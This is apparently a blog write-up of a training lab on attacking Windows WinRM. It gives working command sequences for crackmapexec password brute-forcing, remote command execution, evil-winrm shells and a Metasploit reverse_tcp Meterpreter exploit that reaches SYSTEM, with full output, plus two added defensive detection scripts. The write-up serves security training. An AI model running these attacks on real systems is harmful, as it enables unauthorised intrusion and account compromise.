Exploiting WinRM

Posted by r3kind1e on September 18, 2022


Windows Remote Management (WinRM) is a Windows remote management protocol that can be used to facilitate remote access to Windows systems over HTTP(S).

Microsoft implemented WinRM in Windows to make life easier for system administrators.

WinRM is typically used in the following ways:

  • Remotely access and interact with Windows hosts on a local network.
  • Remotely access and execute commands on Windows systems.
  • Remotely manage and configure Windows systems.
  • WinRM typically uses TCP ports 5985 (HTTP) and 5986 (HTTPS).

WinRM implements access control and security for communication between systems through various forms of authentication.

We can use a utility called "crackmapexec" to brute-force WinRM in order to identify users and their passwords, and to execute commands on the target system.

We can also use a Ruby script called "evil-winrm" to obtain a command shell session on the target system.

Demo: Exploiting WinRM

WinRM is a feature that exists within Windows; however, it is not enabled by default and has to be explicitly configured and enabled before it works and before you can make use of it.

Target IP Address: 10.2.18.45
nmap -sV 10.2.18.45

Don't pay attention to the banner or service version nmap shows here: neither nmap nor Windows itself explicitly labels this service as WinRM. We do know, however, that WinRM is running on this port.

nmap -sV -p 5985 10.2.18.45

Brute Forcing & Password Spraying

crackmapexec <protocol> <target(s)> -u username1 -p password1 password2
crackmapexec <protocol> <target(s)> -u username1 username2 -p password1
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

WinRM Protocol Password spraying

#~ cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

Why are we only targeting the administrator account? Let's take a few things into consideration:

Firstly, on Windows the built-in administrator account is always present, because it is the first account created when Windows is installed.

Secondly, the administrator account is typically the account a system administrator uses to access the system, for obvious reasons.

Thirdly, if we gain access to the administrator account we already have elevated privileges, so we do not have to go through the process of escalating our privileges manually.

crackmapexec winrm 10.2.18.45 -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

WINRM   10.2.18.45  5985    NONE    [*] http://10.2.18.45:5985/wsman

It actually connects to WinRM; don't worry that it reports the wsman service, because WinRM is the Windows implementation of WS-Management (WS-Man).

We can use crackmapexec to execute arbitrary Windows commands on the target.

Command execution

Execute Command using WinRM

#~ cme winrm 192.168.255.131 -u user -p 'password' -X whoami
WINRM       192.168.255.131 5985   ROGER            [*] http://192.168.255.131:5985/wsman
WINRM       192.168.255.131 5985   ROGER            [+] GOLD\user:password (Pwn3d!)
WINRM       192.168.255.131 5985   ROGER            [+] Executed command
WINRM       192.168.255.131 5985   ROGER            gold\user
crackmapexec winrm 10.2.18.45 -u administrator -p tinkerbell -x "whoami"

Enumerate all the information to this particular system:

crackmapexec winrm 10.2.18.45 -u administrator -p tinkerbell -x "systeminfo"

We have not used any exploit code or exploited a vulnerability within WinRM: we simply performed a brute-force attack and are now using the WinRM protocol to legitimately execute commands on the target system. Executing commands on the target will of course generate its own logs, which can be cleared very easily, but this is relatively safe because if WinRM is enabled on the target, firewall rules or exceptions will have been added so that you can communicate with the system via WinRM without restriction.
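The commands run "legitimately" through WinRM still leave a recognisable process lineage on the target: commands sent through the WinRS shell (what crackmapexec's -x/-X uses) are spawned by winrshost.exe, and PowerShell remoting sessions (what evil-winrm uses) run inside wsmprovhost.exe. The script below is an added example, not code from the original post or from any of the tools it uses; it walks the parent chain of constructed process-creation events (the fields of Security 4688 or Sysmon Event 1, not captured from the lab) and reports everything that originated from a WinRM session, including script interpreters such as the cscript.exe that a VBS command stager would launch.

```python
"""Added example (not from the original post): trace process activity on the
target back to a WinRM session.

SAMPLE_EVENTS is CONSTRUCTED in a simplified key=value form; a real collector
(Security 4688 / Sysmon 1) gives the same three fields as structured data.
"""
import ntpath

# host processes that run remote WinRM work on the target
WINRM_HOSTS = {"winrshost.exe", "wsmprovhost.exe"}

SAMPLE_EVENTS = r"""
pid=700  ppid=600  image=C:\Windows\System32\svchost.exe
pid=2100 ppid=700  image=C:\Windows\System32\winrshost.exe
pid=2110 ppid=2100 image=C:\Windows\System32\cmd.exe
pid=2120 ppid=2110 image=C:\Windows\System32\whoami.exe
pid=2130 ppid=2110 image=C:\Windows\System32\systeminfo.exe
pid=2500 ppid=2100 image=C:\Windows\System32\cmd.exe
pid=2510 ppid=2500 image=C:\Windows\System32\cscript.exe
pid=2400 ppid=700  image=C:\Windows\System32\wsmprovhost.exe
pid=2410 ppid=2400 image=C:\Windows\System32\net.exe
pid=3000 ppid=1500 image=C:\Windows\explorer.exe
pid=3010 ppid=3000 image=C:\Windows\System32\cmd.exe
pid=3020 ppid=3010 image=C:\Windows\System32\whoami.exe
"""


def parse_process_events(text):
    """Return {pid: (ppid, image_basename)} from the key=value lines."""
    procs = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(item.split("=", 1) for item in line.split())
        image = ntpath.basename(fields["image"]).lower()
        procs[int(fields["pid"])] = (int(fields["ppid"]), image)
    return procs


def lineage(procs, pid):
    """Ancestor chain as image basenames, oldest first, ending with pid itself."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:   # stop at unknown parents or pid reuse loops
        seen.add(pid)
        ppid, image = procs[pid]
        chain.append(image)
        pid = ppid
    return list(reversed(chain))


def winrm_spawned(procs):
    """Map each pid whose ancestry contains a WinRM host process to the chain
    from that host process down to the pid. The host process itself is not
    reported, only what it spawned."""
    findings = {}
    for pid in procs:
        chain = lineage(procs, pid)
        for i, name in enumerate(chain[:-1]):
            if name in WINRM_HOSTS:
                findings[pid] = chain[i:]
                break
    return findings


def script_hosts_over_winrm(findings):
    """Subset whose leaf process is a script interpreter: the shape a VBS or
    PowerShell command stager leaves behind."""
    interpreters = {"cscript.exe", "wscript.exe", "powershell.exe", "mshta.exe"}
    return {pid: chain for pid, chain in findings.items() if chain[-1] in interpreters}


if __name__ == "__main__":
    found = winrm_spawned(parse_process_events(SAMPLE_EVENTS))
    for pid, chain in sorted(found.items()):
        print(pid, " -> ".join(chain))
    print("script hosts:", sorted(script_hosts_over_winrm(found)))
```

The whoami run from the interactive explorer.exe session (pid 3020) is not reported, while the same command under winrshost.exe is; that distinction is what lets you baseline WinRM-originated activity against the jump hosts and accounts that are supposed to use it.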

Obtain a command shell session:

evil-winrm

We get a command shell facilitated through PowerShell.

evil-winrm.rb -u administrator -p 'tinkerbell' -i 10.2.18.45

PS C:\Users\Administrator\Documents> whoami
PS C:\Users\Administrator\Documents> ipconfig
PS C:\Users\Administrator\Documents> net user

WinRM Script Exec Remote Code Execution


This module uses valid credentials to log in to the WinRM service and execute a payload. It has two available payload delivery methods: PowerShell 2.0 and VBS CmdStager. The module checks whether PowerShell 2.0 is available and, if so, uses that method; otherwise it falls back to the less stealthy VBS CmdStager. IMPORTANT: if targeting an x64 system with the PowerShell method, you MUST select an x64 payload. An x86 payload will never return.

It is a 64-bit Meterpreter session because the session migrated to a 64-bit process, and we then inherit the privileges associated with that process.

service postgresql start && msfconsole

search winrm_script
use exploit/windows/winrm/winrm_script_exec
show options
set RHOSTS 10.2.18.45
set FORCE_VBS true
set USERNAME administrator
set PASSWORD tinkerbell
exploit

meterpreter > sysinfo
meterpreter > getuid

WinRM: Exploitation with Metasploit

Overview

You are provided with a Kali GUI machine and a target machine running a WinRM server. The IP address of the target machine is provided in a text file named target on the Kali machine's desktop (/root/Desktop/target).

Your task is to fingerprint the WinRM service using the tools available on the Kali machine, and then exploit it using the Metasploit Framework exploit and auxiliary modules.

Objective: Exploit the WinRM service to get a Meterpreter on the target and retrieve the flag!

Instructions:

Your Kali machine has an interface with IP address 10.10.X.Y. Run "ip addr" to find the values of X and Y.

The IP address of the target machine is given in the file "/root/Desktop/target".

Do not attack the gateways located at IP addresses 192.V.W.1 and 10.10.X.1.

Wordlists used:

/usr/share/metasploit-framework/data/wordlists/common_users.txt

/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

My own approach

Target IP Address : 10.3.27.236
root@attackdefense:~# nmap -sV 10.3.27.236
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-17 18:14 IST
Nmap scan report for 10.3.27.236
Host is up (0.0026s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.09 seconds

root@attackdefense:~# nmap -p- 10.3.27.236
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-17 18:16 IST
Nmap scan report for 10.3.27.236
Host is up (0.0026s latency).
Not shown: 65521 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49671/tcp open  unknown
49673/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 334.69 seconds
root@attackdefense:~# nmap -sV -p 5985 10.3.27.236
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-17 18:25 IST
Nmap scan report for 10.3.27.236
Host is up (0.0030s latency).

PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.61 seconds

Using Credentials

crackmapexec winrm 10.3.27.236 -u /usr/share/metasploit-framework/data/wordlists/common_users.txt -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
WINRM       10.3.27.236     5985   NONE             [-] None\administrator:elizabeth "Failed to authenticate the user administrator with ntlm"
WINRM       10.3.27.236     5985   NONE             [-] None\administrator:hottie "Failed to authenticate the user administrator with ntlm"
WINRM       10.3.27.236     5985   NONE             [+] None\administrator:tinkerbell (Pwn3d!)

WinRM protocol Command execution

root@attackdefense:~# crackmapexec winrm 10.3.27.236 -u administrator -p tinkerbell -X whoami
WINRM       10.3.27.236     5985   NONE             [*] http://10.3.27.236:5985/wsman
WINRM       10.3.27.236     5985   NONE             [+] None\administrator:tinkerbell (Pwn3d!)
WINRM       10.3.27.236     5985   NONE             [+] Executed command
WINRM       10.3.27.236     5985   NONE             server\administrator
root@attackdefense:~# crackmapexec winrm 10.3.27.236 -u administrator -p tinkerbell -x ipconfig
WINRM       10.3.27.236     5985   NONE             [*] http://10.3.27.236:5985/wsman
WINRM       10.3.27.236     5985   NONE             [+] None\administrator:tinkerbell (Pwn3d!)
WINRM       10.3.27.236     5985   NONE             [+] Executed command
WINRM       10.3.27.236     5985   NONE             
Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : us-west-1.compute.internal
   Link-local IPv6 Address . . . . . : fe80::cda1:e4e1:4b3a:b51d%4
   IPv4 Address. . . . . . . . . . . : 10.3.27.236
   Subnet Mask . . . . . . . . . . . : 255.255.240.0
   Default Gateway . . . . . . . . . : 10.3.16.1

root@attackdefense:~# crackmapexec winrm 10.3.27.236 -u administrator -p tinkerbell -x "systeminfo"
WINRM       10.3.27.236     5985   NONE             [*] http://10.3.27.236:5985/wsman
WINRM       10.3.27.236     5985   NONE             [+] None\administrator:tinkerbell (Pwn3d!)
WINRM       10.3.27.236     5985   NONE             [+] Executed command
WINRM       10.3.27.236     5985   NONE             
Host Name:                 SERVER
OS Name:                   Microsoft Windows Server 2019 Datacenter
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          EC2
Registered Organization:   Amazon.com
Product ID:                00430-00000-00000-AA975
Original Install Date:     10/1/2020, 2:03:19 PM
System Boot Time:          9/17/2022, 12:42:08 PM
System Manufacturer:       Xen
System Model:              HVM domU
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2400 Mhz
BIOS Version:              Xen 4.2.amazon, 8/24/2006
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC) Coordinated Universal Time
Total Physical Memory:     4,096 MB
Available Physical Memory: 3,188 MB
Virtual Memory: Max Size:  5,504 MB
Virtual Memory: Available: 4,731 MB
Virtual Memory: In Use:    773 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\SERVER
Hotfix(s):                 20 Hotfix(s) Installed.
                           [01]: KB4570720
                           [02]: KB4470502
                           [03]: KB4470788
                           [04]: KB4480056
                           [05]: KB4493510
                           [06]: KB4494174
                           [07]: KB4499728
                           [08]: KB4504369
                           [09]: KB4512577
                           [10]: KB4512937
                           [11]: KB4521862
                           [12]: KB4523204
                           [13]: KB4539571
                           [14]: KB4549947
                           [15]: KB4558997
                           [16]: KB4561600
                           [17]: KB4562562
                           [18]: KB4566424
                           [19]: KB4570332
                           [20]: KB4570333
Network Card(s):           1 NIC(s) Installed.
                           [01]: AWS PV Network Device
                                 Connection Name: Ethernet
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.3.16.1
                                 IP address(es)
                                 [01]: 10.3.27.236
                                 [02]: fe80::cda1:e4e1:4b3a:b51d
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

evil-winrm

root@attackdefense:/opt/evil-winrm# ls
CHANGELOG.md  CODE_OF_CONDUCT.md  CONTRIBUTING.md  Dockerfile  Gemfile	Gemfile.lock  LICENSE  README.md  evil-winrm.rb  resources
root@attackdefense:/opt/evil-winrm# evil-winrm.rb -i 10.3.27.236 -u administrator -p tinkerbell

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami      
server\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : us-west-1.compute.internal
   Link-local IPv6 Address . . . . . : fe80::cda1:e4e1:4b3a:b51d%4
   IPv4 Address. . . . . . . . . . . : 10.3.27.236
   Subnet Mask . . . . . . . . . . . : 255.255.240.0
   Default Gateway . . . . . . . . . : 10.3.16.1
*Evil-WinRM* PS C:\Users\Administrator\Documents> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            auditor                  DefaultAccount
demo                     Guest                    sysadmin
WDAGUtilityAccount
The command completed with one or more errors.

WinRM Script Exec Remote Code Execution


This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. The module will check if Powershell 2.0 is available, and if so uses that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. IMPORTANT: If targeting an x64 system with the Powershell method you MUST select an x64 payload. An x86 payload will never return.

Target IP Address : 10.0.28.36
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
msf5 > search winrm

Matching Modules
================

   #  Name                                        Disclosure Date  Rank    Check  Description
   -  ----                                        ---------------  ----    -----  -----------
   0  auxiliary/scanner/winrm/winrm_auth_methods                   normal  No     WinRM Authentication Method Detection
   1  auxiliary/scanner/winrm/winrm_cmd                            normal  No     WinRM Command Runner
   2  auxiliary/scanner/winrm/winrm_login                          normal  No     WinRM Login Utility
   3  auxiliary/scanner/winrm/winrm_wql                            normal  No     WinRM WQL Query Runner
   4  exploit/windows/winrm/winrm_script_exec     2012-11-01       manual  No     WinRM Script Exec Remote Code Execution


Interact with a module by name or index, for example use 4 or use exploit/windows/winrm/winrm_script_exec

msf5 > use exploit/windows/winrm/winrm_script_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/winrm/winrm_script_exec) > show options

Module options (exploit/windows/winrm/winrm_script_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN     WORKSTATION      yes       The domain to use for Windows authentification
   FORCE_VBS  false            yes       Force the module to use the VBS CmdStager
   PASSWORD                    yes       A specific password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      5985             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URI        /wsman           yes       The URI of the WinRM service
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    yes       A specific username to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.16.4       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf5 exploit(windows/winrm/winrm_script_exec) > set FORCE_VBS true
FORCE_VBS => true
msf5 exploit(windows/winrm/winrm_script_exec) > set PASSWORD tinkerbell
PASSWORD => tinkerbell
msf5 exploit(windows/winrm/winrm_script_exec) > set RHOSTS 10.0.28.36
RHOSTS => 10.0.28.36
msf5 exploit(windows/winrm/winrm_script_exec) > set USERNAME administrator
USERNAME => administrator
msf5 exploit(windows/winrm/winrm_script_exec) > exploit

[*] Started reverse TCP handler on 10.10.16.4:4444 
[*] User selected the FORCE_VBS option
[*] Command Stager progress -   2.01% done (2046/101936 bytes)
[*] Command Stager progress -   4.01% done (4092/101936 bytes)
[*] Command Stager progress -   6.02% done (6138/101936 bytes)
[*] Command Stager progress -   8.03% done (8184/101936 bytes)
[*] Command Stager progress -  10.04% done (10230/101936 bytes)
[*] Command Stager progress -  12.04% done (12276/101936 bytes)
[*] Command Stager progress -  14.05% done (14322/101936 bytes)
[*] Command Stager progress -  16.06% done (16368/101936 bytes)
[*] Command Stager progress -  18.06% done (18414/101936 bytes)
[*] Command Stager progress -  20.07% done (20460/101936 bytes)
[*] Command Stager progress -  22.08% done (22506/101936 bytes)
[*] Command Stager progress -  24.09% done (24552/101936 bytes)
[*] Command Stager progress -  26.09% done (26598/101936 bytes)
[*] Command Stager progress -  28.10% done (28644/101936 bytes)
[*] Command Stager progress -  30.11% done (30690/101936 bytes)
[*] Command Stager progress -  32.11% done (32736/101936 bytes)
[*] Command Stager progress -  34.12% done (34782/101936 bytes)
[*] Command Stager progress -  36.13% done (36828/101936 bytes)
[*] Command Stager progress -  38.14% done (38874/101936 bytes)
[*] Command Stager progress -  40.14% done (40920/101936 bytes)
[*] Command Stager progress -  42.15% done (42966/101936 bytes)
[*] Command Stager progress -  44.16% done (45012/101936 bytes)
[*] Command Stager progress -  46.16% done (47058/101936 bytes)
[*] Command Stager progress -  48.17% done (49104/101936 bytes)
[*] Command Stager progress -  50.18% done (51150/101936 bytes)
[*] Command Stager progress -  52.19% done (53196/101936 bytes)
[*] Command Stager progress -  54.19% done (55242/101936 bytes)
[*] Command Stager progress -  56.20% done (57288/101936 bytes)
[*] Command Stager progress -  58.21% done (59334/101936 bytes)
[*] Command Stager progress -  60.21% done (61380/101936 bytes)
[*] Command Stager progress -  62.22% done (63426/101936 bytes)
[*] Command Stager progress -  64.23% done (65472/101936 bytes)
[*] Command Stager progress -  66.24% done (67518/101936 bytes)
[*] Command Stager progress -  68.24% done (69564/101936 bytes)
[*] Command Stager progress -  70.25% done (71610/101936 bytes)
[*] Command Stager progress -  72.26% done (73656/101936 bytes)
[*] Command Stager progress -  74.26% done (75702/101936 bytes)
[*] Command Stager progress -  76.27% done (77748/101936 bytes)
[*] Command Stager progress -  78.28% done (79794/101936 bytes)
[*] Command Stager progress -  80.29% done (81840/101936 bytes)
[*] Command Stager progress -  82.29% done (83886/101936 bytes)
[*] Command Stager progress -  84.30% done (85932/101936 bytes)
[*] Command Stager progress -  86.31% done (87978/101936 bytes)
[*] Command Stager progress -  88.31% done (90024/101936 bytes)
[*] Command Stager progress -  90.32% done (92070/101936 bytes)
[*] Command Stager progress -  92.33% done (94116/101936 bytes)
[*] Command Stager progress -  94.34% done (96162/101936 bytes)
[*] Command Stager progress -  96.34% done (98208/101936 bytes)
[*] Command Stager progress -  98.35% done (100252/101936 bytes)
[*] Sending stage (176195 bytes) to 10.0.28.36
[*] Meterpreter session 1 opened (10.10.16.4:4444 -> 10.0.28.36:49751) at 2022-09-17 19:41:07 +0530
[*] Session ID 1 (10.10.16.4:4444 -> 10.0.28.36:49751) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is katzx.exe (3612) as: SERVER\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[-] Could not migrate to services.exe.
[-] Could not migrate to wininit.exe.
[*] Trying svchost.exe (896)
[+] Successfully migrated to svchost.exe (896) as: NT AUTHORITY\SYSTEM
[*] nil
[*] Command Stager progress - 100.00% done (101936/101936 bytes)

meterpreter > sysinfo
Computer        : SERVER
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > cat c:\\flag.txt
3c716f95616eec677a7078f92657a230

Solution

The solution to this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-2026.pdf

WinRM Login Utility

WinRM Authentication Method Detection

WinRM Command Runner

WinRM Script Exec Remote Code Execution

Authentication for remote connections

Following the reference solution

root@attackdefense:~# nmap --top-port 7000 10.0.28.36
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-17 20:00 IST
Nmap scan report for 10.0.28.36
Host is up (0.0030s latency).
Not shown: 6995 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 36.48 seconds

WinRM Login Utility


This module attempts to authenticate to the WinRM service. It currently works only if the remote end allows Negotiate (NTLM) authentication. Kerberos is not currently supported. Please note: in order to use this module without SSL, the "AllowUnencrypted" WinRM option must be set. Otherwise adjust the port and set the SSL option in the module as needed.

root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
msf5 > use auxiliary/scanner/winrm/winrm_login
msf5 auxiliary(scanner/winrm/winrm_login) > show options

Module options (auxiliary/scanner/winrm/winrm_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DOMAIN            WORKSTATION      yes       The domain to use for Windows authentification
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             5985             yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   URI               /wsman           yes       The URI of the WinRM service
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host

msf5 auxiliary(scanner/winrm/winrm_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf5 auxiliary(scanner/winrm/winrm_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf5 auxiliary(scanner/winrm/winrm_login) > set VERBOSE false
VERBOSE => false
msf5 auxiliary(scanner/winrm/winrm_login) > set RHOSTS 10.0.28.36
RHOSTS => 10.0.28.36
msf5 auxiliary(scanner/winrm/winrm_login) > run

[+] 10.0.28.36:5985 - Login Successful: WORKSTATION\administrator:tinkerbell
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/winrm/winrm_login) > 

WinRM Authentication Method Detection


This module sends a request to an HTTP/HTTPS service to see whether it is a WinRM service. If it is, it also gathers the supported authentication methods.

Target IP Address : 10.0.20.140
msf5 > use auxiliary/scanner/winrm/winrm_auth_methods
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > show options

Module options (auxiliary/scanner/winrm/winrm_auth_methods):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DOMAIN   WORKSTATION      yes       The domain to use for Windows authentification
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    5985             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads (max one per host)
   URI      /wsman           yes       The URI of the WinRM service
   VHOST                     no        HTTP server virtual host

msf5 auxiliary(scanner/winrm/winrm_auth_methods) > set RHOSTS 10.0.20.140
RHOSTS => 10.0.20.140
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > run

[+] 10.0.20.140:5985: Negotiate protocol supported
[+] 10.0.20.140:5985: Basic protocol supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
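What the module reports as "Negotiate protocol supported" / "Basic protocol supported" comes from the WWW-Authenticate headers in the HTTP 401 that WinRM's HTTP.sys listener (the "Microsoft HTTPAPI httpd 2.0" banner nmap showed on 5985 earlier) returns for an unauthenticated request to /wsman. The script below is an added example, not code from the original post or from Metasploit; it parses a constructed 401 response (shaped like a WinRM reply, not captured from the lab) into the same list and then rates each method the way an administrator auditing their own hosts would: Basic over plain HTTP means credentials cross the wire base64-encoded, which is effectively cleartext.

```python
"""Added example (not from the original post): read the authentication
methods a WinRM endpoint offers from its HTTP 401 response and rate them.

SAMPLE_401 is CONSTRUCTED to match the shape of a WinRM reply on port 5985.
"""

SAMPLE_401 = (
    "HTTP/1.1 401 \r\n"
    "Server: Microsoft-HTTPAPI/2.0\r\n"
    "WWW-Authenticate: Negotiate\r\n"
    "WWW-Authenticate: Basic realm=\"WSMAN\"\r\n"
    "Date: Sat, 17 Sep 2022 15:10:00 GMT\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_winrm_response(raw):
    """Split a raw HTTP response into status, Server header and the list of
    offered authentication schemes (one WWW-Authenticate header per scheme)."""
    head, _, _body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split()[1])
    headers = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    # the scheme is the first token; "Basic realm=..." -> "Basic"
    auth = [v.split()[0] for n, v in headers if n == "www-authenticate" and v]
    server = next((v for n, v in headers if n == "server"), "")
    return {
        "status": status,
        "server": server,
        # WinRM is served by HTTP.sys, so a 401 from Microsoft-HTTPAPI on /wsman
        # is the signature the auth_methods module keys on
        "is_winrm": status == 401 and server.startswith("Microsoft-HTTPAPI"),
        "auth_methods": auth,
    }


def assess(info, tls):
    """Rate each offered scheme for a listener that is (tls=True) or is not
    (tls=False) behind HTTPS. Whether the SOAP body itself is encrypted under
    Negotiate depends on the server-side AllowUnencrypted setting, which the
    headers do not reveal; check it on the host with 'winrm get winrm/config'."""
    findings = []
    for method in info["auth_methods"]:
        if method == "Basic":
            findings.append({
                "method": method,
                "severity": "medium" if tls else "high",
                "note": "password sent base64-encoded; cleartext unless the transport is HTTPS",
            })
        elif method == "Negotiate":
            findings.append({
                "method": method,
                "severity": "low" if tls else "medium",
                "note": "NTLM on workgroup hosts, Kerberos in a domain; "
                        "each guessed password is verified online, so watch for 4625 bursts",
            })
        else:
            findings.append({"method": method, "severity": "info", "note": "review manually"})
    return findings


if __name__ == "__main__":
    info = parse_winrm_response(SAMPLE_401)
    print("WinRM:", info["is_winrm"], "methods:", info["auth_methods"])
    for f in assess(info, tls=False):
        print(f"{f['method']:<10} {f['severity']:<7} {f['note']}")
```

For the constructed response the parser yields ["Negotiate", "Basic"], exactly the two lines the module printed for 10.0.20.140, and on a plain-HTTP 5985 listener Basic is rated high. The practical fix on the host side is to disable Basic (and leave AllowUnencrypted off) unless the listener is on 5986 with a proper certificate.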

WinRM Command Runner


This module runs arbitrary Windows commands using the WinRM service.

msf5 auxiliary(scanner/winrm/winrm_auth_methods) > use auxiliary/scanner/winrm/winrm_cmd
msf5 auxiliary(scanner/winrm/winrm_cmd) > show options

Module options (auxiliary/scanner/winrm/winrm_cmd):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD       ipconfig /all    yes       The windows command to run
   DOMAIN    WORKSTATION      yes       The domain to use for Windows authentification
   PASSWORD                   yes       The password to authenticate with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
